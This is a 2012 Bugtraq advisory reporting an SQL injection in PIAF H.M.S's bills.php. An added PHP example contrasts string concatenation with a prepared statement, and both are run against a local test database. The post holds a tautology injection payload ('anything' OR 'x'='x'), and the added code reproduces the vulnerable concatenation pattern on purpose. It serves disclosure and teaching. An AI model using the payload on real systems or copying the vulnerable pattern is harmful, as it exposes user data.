Message-ID: <CAHKpqwbdsw94U2LX4a3FH64jT9iTU3n+C3E_d_W=gaTVmckOzA@mail.gmail.com>
Date: Sun, 28 Oct 2012 13:29:31 +0100
From: Michał Błaszczak <blaszczakm@...il.com>
To: bugtraq@...urityfocus.com
Subject: PIAF H.M.S - SQL Injection

# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/

file: bills.php
line: 86-87

        $query = $query . " ORDER BY ID DESC";
        printf($query);

query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC


Michał Błaszczak
blaszczakm.blogspot.com
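
Added example, not part of the original post and not PIAF H.M.S code: the string-concatenation pattern reported at bills.php lines 86-87 beside a prepared-statement version, both run with the value that produces the query shown above. The post does not show how the `Room` value reaches the query, so the WHERE-clause concatenation, the table columns, the sample rows, the function names and the SQLite in-memory database (standing in for MySQL) are assumptions.

```php
<?php
// Added illustration; not the project's code. Schema, rows and function
// names are constructed. SQLite in-memory stands in for the MySQL backend.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE Users (ID INTEGER PRIMARY KEY, Name TEXT, Room TEXT)");
$db->exec("INSERT INTO Users (Name, Room) VALUES
           ('alice', '101'), ('bob', '102'), ('carol', '103')");

// Pattern from the report: the value becomes part of the SQL text, so a
// quote character in it changes the structure of the WHERE clause.
function billsConcatenated(PDO $db, string $room): array
{
    $query = "SELECT * FROM `Users` WHERE `Room` = '" . $room . "'"; // assumed
    $query = $query . " ORDER BY ID DESC";                           // as reported
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the SQL text is a constant and the value is bound as data,
// so it is only ever compared against the Room column.
function billsPrepared(PDO $db, string $room): array
{
    $stmt = $db->prepare(
        "SELECT * FROM `Users` WHERE `Room` = :room ORDER BY ID DESC"
    );
    $stmt->execute([':room' => $room]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Value reconstructed from the query quoted in the report.
$input = "anything' OR 'x'='x";

printf("concatenated, reported input: %d rows\n",
       count(billsConcatenated($db, $input)));
printf("prepared, reported input:     %d rows\n",
       count(billsPrepared($db, $input)));
printf("prepared, room 102:           %d rows\n",
       count(billsPrepared($db, '102')));
```

The hardened function also leaves out the `printf($query)` call from the reported lines, since echoing the assembled SQL to the page exposes table and column names to every visitor.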
